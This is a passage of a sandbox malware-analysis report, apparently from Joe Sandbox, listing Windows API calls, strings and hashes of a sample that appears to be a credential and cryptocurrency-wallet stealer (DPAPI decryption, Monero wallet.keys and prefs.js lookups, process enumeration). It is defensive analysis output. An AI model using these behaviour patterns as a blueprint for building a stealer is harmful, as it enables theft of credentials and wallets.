                        • FindFirstFileA.KERNEL32(?,?), ref: 00F145BD
                        • StrCmpCA.SHLWAPI(?,00F20FC4), ref: 00F145EB
                        • StrCmpCA.SHLWAPI(?,00F20FC8), ref: 00F14601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1468B
                        • FindClose.KERNEL32(000000FF), ref: 00F146A0
                        • lstrcat.KERNEL32(?,008AF2A8), ref: 00F146C5
                        • lstrcat.KERNEL32(?,008ADDF8), ref: 00F146D8
                        • lstrlen.KERNEL32(?), ref: 00F146E5
                        • lstrlen.KERNEL32(?), ref: 00F146F6
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 5ed3cbb9acf3e1c7ee609ec24168255eaa5f23e10d32f03944e3226080ea76ff
                        • Instruction ID: 17dd8fa3acc56565d4636a39dd672abf78cf8b65e32800e35f561d47e6e49276
                        • Opcode Fuzzy Hash: 5ed3cbb9acf3e1c7ee609ec24168255eaa5f23e10d32f03944e3226080ea76ff
                        • Instruction Fuzzy Hash: FD51C4B6940218ABCB34EB70EC89FED737CAF58701F404598B61A93084EB749BC49F91
                        APIs
                        • wsprintfA.USER32 ref: 00F13EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 00F13EDA
                        • StrCmpCA.SHLWAPI(?,00F20FAC), ref: 00F13F08
                        • StrCmpCA.SHLWAPI(?,00F20FB0), ref: 00F13F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F1406C
                        • FindClose.KERNEL32(000000FF), ref: 00F14081
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: 7478cf8a74da8c662060b86f6f5838154cdd69b8eb23fc42cc00625adbdd18cb
                        • Instruction ID: a94574b518a0966d53f08b8bb90343f3dfed9181733ffe86a4bcfddd7bd34ab2
                        • Opcode Fuzzy Hash: 7478cf8a74da8c662060b86f6f5838154cdd69b8eb23fc42cc00625adbdd18cb
                        • Instruction Fuzzy Hash: 695166B6900218ABDB24EBB0DC45EEA737CFF48700F404598B65A96084EB75EBC59F51
                        APIs
                        • wsprintfA.USER32 ref: 00F0ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 00F0ED55
                        • StrCmpCA.SHLWAPI(?,00F21538), ref: 00F0EDAB
                        • StrCmpCA.SHLWAPI(?,00F2153C), ref: 00F0EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F0F2AE
                        • FindClose.KERNEL32(000000FF), ref: 00F0F2C3
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 9db2e5c914c9921b9d8645d77137f99a225d6dfd445b5cd09e3d4fe7ec7b9adb
                        • Instruction ID: 2918edbb1a4487c6c00019857207a6320b61a71baf38a6386849a5f7605d70f1
                        • Opcode Fuzzy Hash: 9db2e5c914c9921b9d8645d77137f99a225d6dfd445b5cd09e3d4fe7ec7b9adb
                        • Instruction Fuzzy Hash: B0E1F4729121189AEB55FB60DD52EEE733CAF54320F4045E9B40A62092EF346FCAEF51
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F215B8,00F20D96), ref: 00F0F71E
                        • StrCmpCA.SHLWAPI(?,00F215BC), ref: 00F0F76F
                        • StrCmpCA.SHLWAPI(?,00F215C0), ref: 00F0F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F0FAB1
                        • FindClose.KERNEL32(000000FF), ref: 00F0FAC3
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 38a6690d770a0f7309b64f0fa407a318d0065573abc33bf24501e7d7e88c2c72
                        • Instruction ID: b89954ace206fabb2de789c7f815613c9bae899905fd1d2f7fe478e0cf56e352
                        • Opcode Fuzzy Hash: 38a6690d770a0f7309b64f0fa407a318d0065573abc33bf24501e7d7e88c2c72
                        • Instruction Fuzzy Hash: F7B154719011189BDB24FF60DD56FED7379AF54310F4081A8A40A971C1EF39AB8AEF92
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F2510C,?,?,?,00F251B4,?,?,00000000,?,00000000), ref: 00F01923
                        • StrCmpCA.SHLWAPI(?,00F2525C), ref: 00F01973
                        • StrCmpCA.SHLWAPI(?,00F25304), ref: 00F01989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F01D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00F01DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F01E20
                        • FindClose.KERNEL32(000000FF), ref: 00F01E32
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: f4b310b73b68bf81b7ea041b2f3aa115b1db48ba83d4519bca6ed60149fcddc2
                        • Instruction ID: 5a5fc3865f500a44517cb965f7251a43bd7d0dd98be397fffa1190f53b77c94a
                        • Opcode Fuzzy Hash: f4b310b73b68bf81b7ea041b2f3aa115b1db48ba83d4519bca6ed60149fcddc2
                        • Instruction Fuzzy Hash: 7F1244719111189BDB19FB60DD96EEE7378AF54320F404199B10A620D1EF386FCAEF92
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00F20C2E), ref: 00F0DE5E
                        • StrCmpCA.SHLWAPI(?,00F214C8), ref: 00F0DEAE
                        • StrCmpCA.SHLWAPI(?,00F214CC), ref: 00F0DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F0E3E0
                        • FindClose.KERNEL32(000000FF), ref: 00F0E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: 045670034b1b15a417f82f5da3ded8856457c5d0c0e1468d243bbb6a3b0ad29a
                        • Instruction ID: d6b45bd3d5ee2e69b5cbeddc30f5080e0257bfd088e1ddbe227b33da4a259e82
                        • Opcode Fuzzy Hash: 045670034b1b15a417f82f5da3ded8856457c5d0c0e1468d243bbb6a3b0ad29a
                        • Instruction Fuzzy Hash: 1AF1A3718151189ADB29FB60DD95EEE7338BF14320F8041E9B41A62091EF356FCAEF52
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: (x$3}^$:}b$;Xm;$A4$Gt_e$T"j$_B}$aV;$c]~{
                        • API String ID: 0-669431359
                        • Opcode ID: 1817b01fd708dfccb8960fb111a7eeeb8c01b590eb645984aa14011d1045ee1c
                        • Instruction ID: 08c6b795c6378c9e886c19c53fd9a72f5193ee0c32c43cdce4aba2ce85259d4d
                        • Opcode Fuzzy Hash: 1817b01fd708dfccb8960fb111a7eeeb8c01b590eb645984aa14011d1045ee1c
                        • Instruction Fuzzy Hash: 59B204F390C2009FE704AE29EC8567AFBE5EF94720F1A493DE6C587744EA3558448787
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F214B0,00F20C2A), ref: 00F0DAEB
                        • StrCmpCA.SHLWAPI(?,00F214B4), ref: 00F0DB33
                        • StrCmpCA.SHLWAPI(?,00F214B8), ref: 00F0DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F0DDCC
                        • FindClose.KERNEL32(000000FF), ref: 00F0DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 676c179d8d29f8668821a411315ed8480cedebeedc5bf7cbb982b93b3eda49d9
                        • Instruction ID: 0cd6a67afb6ce2a142535fd35c65a7d9db3b2584ef3601ee07a6bbf27aad95c6
                        • Opcode Fuzzy Hash: 676c179d8d29f8668821a411315ed8480cedebeedc5bf7cbb982b93b3eda49d9
                        • Instruction Fuzzy Hash: 0991677290010497DB14FBB0ED569ED737CAF94310F408668F81A961C5FF389B99EB92
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,00F205AF), ref: 00F17BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00F17BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00F17C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00F17C62
                        • LocalFree.KERNEL32(00000000), ref: 00F17D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: cd7f036bf6f2477f84f5ad380a194737f933ad01d6aaca5f53a800acc5db9c1d
                        • Instruction ID: c88520bb81cbd7c90f7b07b324ddc980a53ca6c57e86f84c86c0f26c84574d0c
                        • Opcode Fuzzy Hash: cd7f036bf6f2477f84f5ad380a194737f933ad01d6aaca5f53a800acc5db9c1d
                        • Instruction Fuzzy Hash: E0412A7194121CABDB24EB94DC99BEEB374FF44710F604199E00A66181DB386FC6DFA1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: )Un_$6'_u$6'_u$b+&V$c/?z$mL~$S_
                        • API String ID: 0-3782661490
                        • Opcode ID: 862162499b65ff12fa11f6bba9b570a30e54f9b1a79280976502aaba0dde9fc2
                        • Instruction ID: 88530306c03fc43edff8fd14afef610e57084c73f778e5c9d6ec5443bda39c41
                        • Opcode Fuzzy Hash: 862162499b65ff12fa11f6bba9b570a30e54f9b1a79280976502aaba0dde9fc2
                        • Instruction Fuzzy Hash: 3AB2F6F3A0C2149FE3047E2DEC8567ABBE5EF94720F1A493DEAC483744EA3558058697
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00F20D73), ref: 00F0E4A2
                        • StrCmpCA.SHLWAPI(?,00F214F8), ref: 00F0E4F2
                        • StrCmpCA.SHLWAPI(?,00F214FC), ref: 00F0E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F0EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: c93b31d1f32c50a22130b1735ec8490a2d2481e690d8e5e37a35cb74f43a6e2a
                        • Instruction ID: ba19c9de1a023abf7e1f43b814b4dc0a711d510d348756f5fd1703ec14d63e30
                        • Opcode Fuzzy Hash: c93b31d1f32c50a22130b1735ec8490a2d2481e690d8e5e37a35cb74f43a6e2a
                        • Instruction Fuzzy Hash: BD1262719011189BDB18FB60DD96EED7338AF54320F4045A9B50A960D1EF386FCAEF92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: >N;q$Y?w_$\]$^\w_$b4=$37
                        • API String ID: 0-2706271634
                        • Opcode ID: f6818c804a72e3bd72c0a1c811763840df0911ce591a23df0dd7ead44da941a5
                        • Instruction ID: 29a8e25a459cc171959b1900c697010c1f0e3d078ebb93d4d21cf0f6cfa8efbc
                        • Opcode Fuzzy Hash: f6818c804a72e3bd72c0a1c811763840df0911ce591a23df0dd7ead44da941a5
                        • Instruction Fuzzy Hash: 37B2E5F360C2049FE3046E29EC8577AFBE9EF94720F16492DE6C5C3744E63558418697
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F0C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F0C87C
                        • lstrcat.KERNEL32(?,00F20B46), ref: 00F0C943
                        • lstrcat.KERNEL32(?,00F20B47), ref: 00F0C957
                        • lstrcat.KERNEL32(?,00F20B4E), ref: 00F0C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 7c152d59647deec6683fc98d89a6cc81caca06b670377635d0d0e86296a5320c
                        • Instruction ID: 9699dec8ea5e5c2c61284465e48d11350ecda291eb791e2a861b056e4554ecd5
                        • Opcode Fuzzy Hash: 7c152d59647deec6683fc98d89a6cc81caca06b670377635d0d0e86296a5320c
                        • Instruction Fuzzy Hash: D8417379D4421ADBDB20CF90ED89BEEBBB8BF44704F1042A8E509A7280D7705A84DF91
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00F0724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F07254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00F07281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00F072A4
                        • LocalFree.KERNEL32(?), ref: 00F072AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 4770ef39b1c59df3af7ccdfa15d6dbdc913ee7b6ce6da139d705653c298c00a7
                        • Instruction ID: 15b433b4176993f055b9e27844db866817c541d25c731f97ae1b829dd6ec76d4
                        • Opcode Fuzzy Hash: 4770ef39b1c59df3af7ccdfa15d6dbdc913ee7b6ce6da139d705653c298c00a7
                        • Instruction Fuzzy Hash: B10140B5A80208BBEB24DFD4DD45F9D77B8EB44B01F104054FB16AB2C4DA70BA409B64
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F1961E
                        • Process32First.KERNEL32(00F20ACA,00000128), ref: 00F19632
                        • Process32Next.KERNEL32(00F20ACA,00000128), ref: 00F19647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00F1965C
                        • CloseHandle.KERNEL32(00F20ACA), ref: 00F1967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: cde7803f969f51dcba174a6c0f4e41b8c8bcb48391def157ab35b08346f3a538
                        • Instruction ID: 62411d042578dff631b321df783c976612772d1d032f4507c7af40ad94c84a7c
                        • Opcode Fuzzy Hash: cde7803f969f51dcba174a6c0f4e41b8c8bcb48391def157ab35b08346f3a538
                        • Instruction Fuzzy Hash: FD0152B9A44208EBDB28DFA5D864BDDB7F8EF08711F004198A50697240D7749F80DFA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: KSG$afK$dUO7$iO,$urY
                        • API String ID: 0-1859660493
                        • Opcode ID: c8a143a00feae3de83c6495ed61a71d78a0016aeee3f1da200b0dd56388c64a5
                        • Instruction ID: 92b9d5714dd0ceb179c69af888f601d6ca6353255b68c048ebe94dda6d337c82
                        • Opcode Fuzzy Hash: c8a143a00feae3de83c6495ed61a71d78a0016aeee3f1da200b0dd56388c64a5
                        • Instruction Fuzzy Hash: C68160F3A0C308AFD3046E1DEC8163AF7DADB94660F1A063DEAC4C7344F93298048696
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00F205B7), ref: 00F186CA
                        • Process32First.KERNEL32(?,00000128), ref: 00F186DE
                        • Process32Next.KERNEL32(?,00000128), ref: 00F186F3
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • CloseHandle.KERNEL32(?), ref: 00F18761
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 5ac5cea2cce2d58d630df5b956af9eb75f694a39e632ccfcfe7dc1e848ca27f9
                        • Instruction ID: 4aa697447eb09126dbf7aa27cf96b33af8c2d0f4e21785d3c060956e8ecebe1b
                        • Opcode Fuzzy Hash: 5ac5cea2cce2d58d630df5b956af9eb75f694a39e632ccfcfe7dc1e848ca27f9
                        • Instruction Fuzzy Hash: 5F317C72902218ABCB24EF50DD51FEEB778EF44720F1041A9F10AA2190DF356E86DFA1
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00F05184,40000001,00000000,00000000,?,00F05184), ref: 00F18EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 01e828b5bca4817baa54ee9d393b9501ddda72a76d0ce9e6572a60a1d153bca9
                        • Instruction ID: 91d321713486a518dae7d0b5714a61bcee45c74a330cff3834a01ad990bd88c0
                        • Opcode Fuzzy Hash: 01e828b5bca4817baa54ee9d393b9501ddda72a76d0ce9e6572a60a1d153bca9
                        • Instruction Fuzzy Hash: 1F111C75600205BFDB04CFA4E984FE733AAAF89750F109458F9198B244DB35EC82EB60
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F04EEE,00000000,00000000), ref: 00F09AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00F04EEE,00000000,?), ref: 00F09B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F04EEE,00000000,00000000), ref: 00F09B2A
                        • LocalFree.KERNEL32(?,?,?,?,00F04EEE,00000000,?), ref: 00F09B3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        • Opcode ID: 925389c3e39b03aa38c02eb128b4e546c01969607dd65b72f66e35795a70f528
                        • Instruction ID: 59a19f140bfe54efd35fbb84295b23bc1bfbe34e17d08ebc51902e2c7ec9d68e
                        • Opcode Fuzzy Hash: 925389c3e39b03aa38c02eb128b4e546c01969607dd65b72f66e35795a70f528
                        • Instruction Fuzzy Hash: 8E11D7B8640208AFEB14CF54D855FAA77B5FB89B11F208058F9159B3C4C7B2A941DB50
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F20E00,00000000,?), ref: 00F179B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F179B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,00F20E00,00000000,?), ref: 00F179C4
                        • wsprintfA.USER32 ref: 00F179F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 71d702c7a69ef99fc09994f886efefb7339fa31c1e01233cad3a235d7aaf6062
                        • Instruction ID: d9b8dbbb68e5900abf281cd8e3257b22c5399413321765642d05b0198a6d4a11
                        • Opcode Fuzzy Hash: 71d702c7a69ef99fc09994f886efefb7339fa31c1e01233cad3a235d7aaf6062
                        • Instruction Fuzzy Hash: C3117CB2944118ABDB18DFC9E944BBEB7F8FB4CB12F00411AF616A2284D3385980C7B0
